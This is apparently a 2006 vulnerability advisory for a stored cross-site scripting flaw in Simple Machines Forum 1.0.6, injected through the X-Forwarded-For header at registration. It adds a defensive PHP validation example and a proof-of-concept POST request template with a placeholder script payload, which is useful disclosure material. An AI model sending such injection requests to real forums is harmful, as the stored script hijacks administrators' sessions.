X-Forwarded-For XSS in Simple Machines Forum - SMF
Summary
- Vulnerability: X-Forwarded-For XSS in Simple Machines Forum - SMF
- Discovered: 2006.02.24
- Last Update: 2006.03.06 Exploitation code published
- ID: EV0086
- CVE: CVE-2006-0896
- Risk Level: low
- Type: Cross Site Scripting
- Status: Unpatched. Vendor notified.
- Vendor: n/a
- Vulnerable Software: Simple Machines Forum - SMF (http://www.simplemachines.org/)
- Version: 1.0.6
- PoC/Exploit: Available
- Solution: Not available
- Discovered by: Aliaksandr Hartsuyeu (eVuln.com)
Description
A cross-site scripting vulnerability was found in a Simple Machines Forum - SMF (http://www.simplemachines.org/) script.
Vulnerable script: Sources/Register.php
The variable $_SERVER['HTTP_X_FORWARDED_FOR'] isn't properly sanitized. An HTTP request with a fake X-Forwarded-For value, which may contain arbitrary HTML or script code, can therefore be posted. This code is executed when an administrator opens the "View all members" section in the Administrator's control panel.
The administrator's session is threatened.
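The two checks the description implies are missing, shown as an added example that is not SMF's code or a vendor patch: accept the header only when it parses as an IP address, and HTML-escape the stored value when it is rendered. The function names `member_ip_from_request` and `render_member_ip` and the sample requests are hypothetical.

```php
<?php
// Added example with hypothetical helper names; not taken from Sources/Register.php.

/**
 * Return a value that is safe to store as the member's IP: the first
 * X-Forwarded-For entry only if it parses as IPv4/IPv6, else REMOTE_ADDR.
 * The header is client-supplied, so even a well-formed address is only a
 * claim unless the request came through a proxy you operate.
 */
function member_ip_from_request(array $server): string
{
    $remote = $server['REMOTE_ADDR'] ?? '';
    $remote = filter_var($remote, FILTER_VALIDATE_IP) !== false ? $remote : '0.0.0.0';

    $xff = $server['HTTP_X_FORWARDED_FOR'] ?? '';
    if (!is_string($xff) || $xff === '') {
        return $remote;
    }

    // The header may carry a comma-separated proxy chain; use the first hop.
    $first = trim(explode(',', $xff)[0]);
    return filter_var($first, FILTER_VALIDATE_IP) !== false ? $first : $remote;
}

/** Escape at output too, so rows stored before the fix render as inert text. */
function render_member_ip(string $stored): string
{
    return htmlspecialchars($stored, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Constructed sample requests (documentation address ranges).
$samples = [
    ['REMOTE_ADDR' => '198.51.100.7', 'HTTP_X_FORWARDED_FOR' => '203.0.113.9'],
    ['REMOTE_ADDR' => '198.51.100.7', 'HTTP_X_FORWARDED_FOR' => '203.0.113.9<b>markup</b>'],
    ['REMOTE_ADDR' => '198.51.100.7', 'HTTP_X_FORWARDED_FOR' => '203.0.113.9, 10.0.0.1'],
    ['REMOTE_ADDR' => '198.51.100.7'],
];
foreach ($samples as $s) {
    echo render_member_ip(member_ip_from_request($s)), PHP_EOL;
}
```

The second sample falls back to REMOTE_ADDR because the header value does not parse as an address; the other header values yield 203.0.113.9.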
PoC/Exploit
Example of HTTP POST Query:
- POST /smf/index.php?PHPSESSID=fa9c180d0a3f5fae0de2d56ba6fce944&action=register2 HTTP/1.0
- Host: [host]
- X-Forwarded-For: anyIP[XSS]
- Cookie: PHPSESSID=fa9c180d0a3f5fae0de2d56ba6fce944
- Content-Length: 81
- user=m&email=m@m.com&passwrd1=m&passwrd2=m&regagree=1&regSubmit=Register
Solution
A solution for "X-Forwarded-For XSS in Simple Machines Forum - SMF" is not available. Check the vendor's website for updates.